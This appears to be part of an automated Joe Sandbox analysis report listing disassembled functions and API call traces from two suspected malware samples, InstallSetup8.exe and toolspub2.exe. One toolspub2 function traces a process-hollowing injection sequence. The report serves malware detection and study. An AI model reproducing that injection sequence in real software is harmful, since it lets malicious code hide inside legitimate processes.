Function 00403B94 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,74DF3420,00000000,C:\Users\user\AppData\Local\Temp\,00403B6C,00403A82,?,?,00000008,0000000A,0000000C), ref: 00403BAE
GlobalFree.KERNEL32(00000000), ref: 00403BB5

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403B94

Memory Dump Source

Source File: 0000000D.00000002.3179518855.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3179251452.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3179889284.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000043A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3182111858.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_InstallSetup8.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3081826266
Opcode ID: 522759d04011631da2fa13ba2704cf46823a2ab452b41ebb0ecea140ccdeae61
Instruction ID: cb28855b84c3abb27e6c937247341fa4f051846acd49e0d4b6103447305c23c4
Opcode Fuzzy Hash: 522759d04011631da2fa13ba2704cf46823a2ab452b41ebb0ecea140ccdeae61
Instruction Fuzzy Hash: 5DE0C23362083097C6311F55EE04B1A7778AF89B2AF01402AEC407B2618B74AC538FCC

Uniqueness

Uniqueness Score: -1.00%

Function 00405E72 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\AppData\Local\Temp,004030EE,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp\InstallSetup8.exe,C:\Users\user\AppData\Local\Temp\InstallSetup8.exe,80000000,00000003), ref: 00405E78
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\AppData\Local\Temp,004030EE,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp\InstallSetup8.exe,C:\Users\user\AppData\Local\Temp\InstallSetup8.exe,80000000,00000003), ref: 00405E88

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00405E72

Memory Dump Source

Source File: 0000000D.00000002.3179518855.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3179251452.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3179889284.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000043A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3182111858.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_InstallSetup8.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 2709904686-47812868
Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
Instruction ID: c6f1eefeac9f22653a6718740f6635ad40246fc98af2d22d27e4b5974eb8f820
Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
Instruction Fuzzy Hash: E1D0A7B3400930EEC312AB04EC04DAF73ACEF123007868827F980A7165D7785D81C6EC

Uniqueness

Uniqueness Score: -1.00%

Function 00405FAC Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBC
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FD4
CharNextA.USER32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FE5
lstrlenA.KERNEL32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEE

Memory Dump Source

Source File: 0000000D.00000002.3179518855.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3179251452.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3179889284.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000043A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3182111858.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_InstallSetup8.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
Instruction ID: e9567a821587a5f0376c4e2be66d4cfc8c6f540c5076303c4651ac02cb4e93c6
Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
Instruction Fuzzy Hash: E1F09631105519FFC7029FA5DE00D9FBBA8EF05350B2540B9F840F7250D678DE01AB69

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: toolspub2.exePID: 4628, Parent PID: 4420COMMON

Executed Functions

Function 00550110 Relevance: 22.7, APIs: 15, Instructions: 248
memorynativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 00550156
GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0055016C
CreateProcessA.KERNELBASE(?,00000000), ref: 00550255
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00550270
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00550283
Wow64GetThreadContext.KERNEL32(00000000,?), ref: 0055029F
ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 005502C8
NtUnmapViewOfSection.NTDLL(00000000,?), ref: 005502E3
VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 00550304
NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0055032A
NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 00550399
WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 005503BF
Wow64SetThreadContext.KERNEL32(00000000,?), ref: 005503E1
ResumeThread.KERNELBASE(00000000), ref: 005503ED
ExitProcess.KERNEL32(00000000), ref: 00550412

Memory Dump Source

Source File: 0000000E.00000002.2052336131.0000000000550000.00000040.00001000.00020000.00000000.sdmp, Offset: 00550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_550000_toolspub2.jbxd

Similarity

API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
String ID:
API String ID: 93872480-0
Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
Instruction ID: 32708e10097d31fdf52c272201a1859b4c6d0db4bca61013f0b73b708b3710e8
Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
Instruction Fuzzy Hash: 55B1C774A00208AFDB44CF98C895F9EBBB5FF88314F248158E909AB391D771AE45CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0058D43E Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0058D466
Module32First.KERNEL32(00000000,00000224), ref: 0058D486

Memory Dump Source

Source File: 0000000E.00000002.2053247085.000000000058C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0058C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_58c000_toolspub2.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 9fafab15b14b18c77fdf93fbc2e094f13f667b87bf6bc8038d33786a49353dd2
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: DEF068311007157BDB203AF5988DB6A7BF8BF45724F100528E946A14D0DAB4FC454771

Uniqueness

Uniqueness Score: -1.00%

Function 00401E1C Relevance: 21.1, APIs: 14, Instructions: 86
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_fast_error_exit.LIBCMT ref: 00401E67
__mtinit.LIBCMT ref: 00401E6D
_fast_error_exit.LIBCMT ref: 00401E78
__RTC_Initialize.LIBCMT ref: 00401E7E
__ioinit.LIBCMT ref: 00401E86
__amsg_exit.LIBCMT ref: 00401E91
GetCommandLineW.KERNEL32 ref: 00401E97
__wsetargv.LIBCMT ref: 00401EAB
__amsg_exit.LIBCMT ref: 00401EB6
__wsetenvp.LIBCMT ref: 00401EBC
__amsg_exit.LIBCMT ref: 00401EC7
__cinit.LIBCMT ref: 00401ECE
__amsg_exit.LIBCMT ref: 00401ED9
__wwincmdln.LIBCMT ref: 00401EDF

Memory Dump Source

Source File: 0000000E.00000002.2048744453.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2048286271.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2049489919.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2050312993.0000000000433000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051189849.0000000000434000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051284963.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051384521.000000000043B000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_toolspub2.jbxd

Similarity

API ID: __amsg_exit$_fast_error_exit$CommandInitializeLine__cinit__ioinit__mtinit__wsetargv__wsetenvp__wwincmdln
String ID:
API String ID: 2477803136-0
Opcode ID: 069b3357a5be55650e6756d4a2bd4ad1e6ddb864f5165f7c21398e7eb2e94545
Instruction ID: ccd15d85702b21695e6e8495f4055b7c927b1b381ac92c247f79720a935a37ad
Opcode Fuzzy Hash: 069b3357a5be55650e6756d4a2bd4ad1e6ddb864f5165f7c21398e7eb2e94545
Instruction Fuzzy Hash: 2A21816194030599EB147BB2D946F6E22A4AF00B08F10447FF9157A1E2EF7C88809ADD

Uniqueness

Uniqueness Score: -1.00%

Function 00550420 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 00550533

Strings

mfoaskdfnoa, xrefs: 00550520, 00550523
saodkfnosa9uin, xrefs: 005504DA
d, xrefs: 00550584
0, xrefs: 00550492

Memory Dump Source

Source File: 0000000E.00000002.2052336131.0000000000550000.00000040.00001000.00020000.00000000.sdmp, Offset: 00550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_550000_toolspub2.jbxd

Similarity

API ID: CreateWindow
String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
API String ID: 716092398-2341455598
Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
Instruction ID: 5b062547acb283f4fe262ef5b1160b54a6412b1010cfb08f6effddfe0855bdaa
Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
Instruction Fuzzy Hash: 97512870D08388DAEB11CBE8C859BDDBFB2AF11709F144059D9447F2C6D3BA5A58CB62

Uniqueness

Uniqueness Score: -1.00%

Function 005505B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNELBASE(apfHQ), ref: 005505EC

Strings

apfHQ, xrefs: 005505E2, 005505E5
o, xrefs: 00550600

Memory Dump Source

Source File: 0000000E.00000002.2052336131.0000000000550000.00000040.00001000.00020000.00000000.sdmp, Offset: 00550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_550000_toolspub2.jbxd

Similarity

API ID: AttributesFile
String ID: apfHQ$o
API String ID: 3188754299-2999369273
Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
Instruction ID: f287b75ea5e0846bc4a0cfb407c5b23396f6b2352b2972015718fc02db5fc66a
Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
Instruction Fuzzy Hash: A9012170C0424DEEDF10DF98C5183AEBFB5AF41309F1480D9C8092B282D7769B59CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 004266E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30
librarymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(kernel32.dll), ref: 00426748
VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 00426763

Strings

kernel32.dll, xrefs: 004266FC

Memory Dump Source

Source File: 0000000E.00000002.2048744453.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2048286271.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2049489919.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2050312993.0000000000433000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051189849.0000000000434000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051284963.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051384521.000000000043B000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_toolspub2.jbxd

Similarity

API ID: LibraryLoadProtectVirtual
String ID: kernel32.dll
API String ID: 3279857687-1793498882
Opcode ID: d6d69915d554157e10c4a40c04342446089cf66dfc7de8d802e699353e9c96ef
Instruction ID: 8b2b8e4fb54d6c921d7dee1e11cf096887c3967e16f5f55c8f640de935fcfad0
Opcode Fuzzy Hash: d6d69915d554157e10c4a40c04342446089cf66dfc7de8d802e699353e9c96ef
Instruction Fuzzy Hash: A501E875108BC0DEF3129B68BC4A7453FA56736644F8C20B9D180062A3C2E9435DCB3E

Uniqueness

Uniqueness Score: -1.00%

Function 0040AF5C Relevance: 4.5, APIs: 3, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnvironmentStringsW.KERNEL32(?,00401EA6), ref: 0040AF5F
__malloc_crt.LIBCMT ref: 0040AF8D
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0040AF9A

Memory Dump Source

Source File: 0000000E.00000002.2048744453.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2048286271.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2049489919.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2050312993.0000000000433000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051189849.0000000000434000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051284963.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051384521.000000000043B000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_toolspub2.jbxd

Similarity

API ID: EnvironmentStrings$Free__malloc_crt
String ID:
API String ID: 237123855-0
Opcode ID: 84ab018ec46c8c77919c34a960e323109f00ba1cc9f37866fd6141d2b065c455
Instruction ID: 412a99adce50c1fd910c0dbeec5f9e379942bbf2f463107c327d2a701e52642c
Opcode Fuzzy Hash: 84ab018ec46c8c77919c34a960e323109f00ba1cc9f37866fd6141d2b065c455
Instruction Fuzzy Hash: ECF02EB7A143135DC62177757C48C7B1628DAD6369311843BF453D3390F5784D9B42AE

Uniqueness

Uniqueness Score: -1.00%

Function 00426EA0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(?,Xurijogilof gusenulawiwej rorizewezarer), ref: 00426EED

Strings

Xurijogilof gusenulawiwej rorizewezarer, xrefs: 00426EE3

Memory Dump Source

Source File: 0000000E.00000002.2048744453.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2048286271.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2049489919.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2050312993.0000000000433000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051189849.0000000000434000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051284963.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051384521.000000000043B000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_toolspub2.jbxd

Similarity

API ID: lstrcat
String ID: Xurijogilof gusenulawiwej rorizewezarer
API String ID: 4038537762-4058110715
Opcode ID: 140dfa9107953df3afb0cd638184c8a8c2807dbd7fd9195040c7fc8d6c13ae39
Instruction ID: 7cc076c634605cd2c3a32a2ec829a0ac8e8daed81cac9192a307d10163484c6c
Opcode Fuzzy Hash: 140dfa9107953df3afb0cd638184c8a8c2807dbd7fd9195040c7fc8d6c13ae39
Instruction Fuzzy Hash: 7EF0C8B27142509AD714DF78EC0265A33A4B794324F43963ED295C32A0DB389449CB8D

Uniqueness

Uniqueness Score: -1.00%

Function 00426770 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(kernel32.dll,00426DA5), ref: 004267C7

Strings

kernel32.dll, xrefs: 00426774, 004267C2

Memory Dump Source

Source File: 0000000E.00000002.2048744453.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2048286271.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2049489919.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2050312993.0000000000433000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051189849.0000000000434000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051284963.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051384521.000000000043B000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_toolspub2.jbxd

Similarity

API ID: LibraryLoad
String ID: kernel32.dll
API String ID: 1029625771-1793498882
Opcode ID: ec5e0b51112da126821fafc6973ee382f516de78e05a24a05777855ae5e2fb7c
Instruction ID: bfe7baac9c44e061bda3daad43884a88931010eab159c2b725246e5492b764a2
Opcode Fuzzy Hash: ec5e0b51112da126821fafc6973ee382f516de78e05a24a05777855ae5e2fb7c
Instruction Fuzzy Hash: 8CF04E3554DBC0C9F7028778B95B7453EA50332688F8C70B9C0841A6A3C2EA031DCB7E

Uniqueness

Uniqueness Score: -1.00%

Function 0040B25F Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040B274

Memory Dump Source

Source File: 0000000E.00000002.2048744453.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2048286271.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2049489919.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2050312993.0000000000433000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051189849.0000000000434000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051284963.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051384521.000000000043B000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_toolspub2.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 2bf626ef31684d970a2fcbf3625ae71e73505ec8b57e9ff466e35f22ea6d122e
Instruction ID: 54fc6cd2fcc2627452ece0d8686fd415966377411a809f7ce6e0daf8c6edaf10
Opcode Fuzzy Hash: 2bf626ef31684d970a2fcbf3625ae71e73505ec8b57e9ff466e35f22ea6d122e
Instruction Fuzzy Hash: 5ED05E72654709AEEB105F74BD097373BECD3843A5F504436B84CC6190E674C9519548

Uniqueness

Uniqueness Score: -1.00%

Function 0058D0FD Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0058D14E

Memory Dump Source

Source File: 0000000E.00000002.2053247085.000000000058C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0058C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_58c000_toolspub2.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: b8ef28cccf106c654d26ab4320885112b122af9ba4be1a6b388efae99740e1b3
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: E2112D79A00208EFDB01DF98C989E98BFF5AF08350F058094F948AB362D771EA50DF90

Uniqueness

Uniqueness Score: -1.00%

Function 004266B0 Relevance: 1.3, APIs: 1, Instructions: 6
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalAlloc.KERNELBASE(00000000,?,00426D25), ref: 004266B8

Memory Dump Source

Source File: 0000000E.00000002.2048744453.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2048286271.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2049489919.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2050312993.0000000000433000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051189849.0000000000434000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051284963.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051384521.000000000043B000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_toolspub2.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: bbaaf44453f16039dbcac5cb1060e0af8280c55748c130fa4e8e9144b33d4172
Instruction ID: 4f1c2e4eebe5bb52742d9ae3d09c6283a93ad3c9ca4597f04668fb57299dd758
Opcode Fuzzy Hash: bbaaf44453f16039dbcac5cb1060e0af8280c55748c130fa4e8e9144b33d4172
Instruction Fuzzy Hash: AAB092B0604600ABE3108FA4AC85B2137A4F308622F409035F900C1160CA304400DE38

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00414AF0 Relevance: 66.4, APIs: 44, Instructions: 432COMMONLIBRARYCODE

Download Yara Rule

APIs

___getlocaleinfo.LIBCMT ref: 00414B27
___getlocaleinfo.LIBCMT ref: 00414B3C
___getlocaleinfo.LIBCMT ref: 00414B51
___getlocaleinfo.LIBCMT ref: 00414B66
___getlocaleinfo.LIBCMT ref: 00414B7E
___getlocaleinfo.LIBCMT ref: 00414B93
___getlocaleinfo.LIBCMT ref: 00414BA5
___getlocaleinfo.LIBCMT ref: 00414BBA
___getlocaleinfo.LIBCMT ref: 00414BD2
___getlocaleinfo.LIBCMT ref: 00414BE7

Memory Dump Source

Source File: 0000000E.00000002.2048744453.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2048286271.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2049489919.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2050312993.0000000000433000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051189849.0000000000434000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051284963.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051384521.000000000043B000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_toolspub2.jbxd

Similarity

API ID: ___getlocaleinfo
String ID:
API String ID: 1937885557-0
Opcode ID: cc9aac0d196b571569cb6675c6b50e553051f93046ba3015fc8ef8c21734618c
Instruction ID: 9311434b839d4a8cbf5782c627e4076a2b15186f35fb2a004efcb92cd2c516f1
Opcode Fuzzy Hash: cc9aac0d196b571569cb6675c6b50e553051f93046ba3015fc8ef8c21734618c
Instruction Fuzzy Hash: F7E1E3B3A0024EBEEF11DAF1CC45DFF77BDEB04788F05092AB215E2441E974AA159764

Uniqueness

Uniqueness Score: -1.00%

Function 00401154 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0040202F
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00402044
UnhandledExceptionFilter.KERNEL32(@SC), ref: 0040204F
GetCurrentProcess.KERNEL32(C0000409), ref: 0040206B
TerminateProcess.KERNEL32(00000000), ref: 00402072

Strings

@SC, xrefs: 0040204A

Memory Dump Source

Source File: 0000000E.00000002.2048744453.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2048286271.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2049489919.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2050312993.0000000000433000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051189849.0000000000434000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051284963.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2051384521.000000000043B000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_toolspub2.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID: @SC
API String ID: 2579439406-4053289583
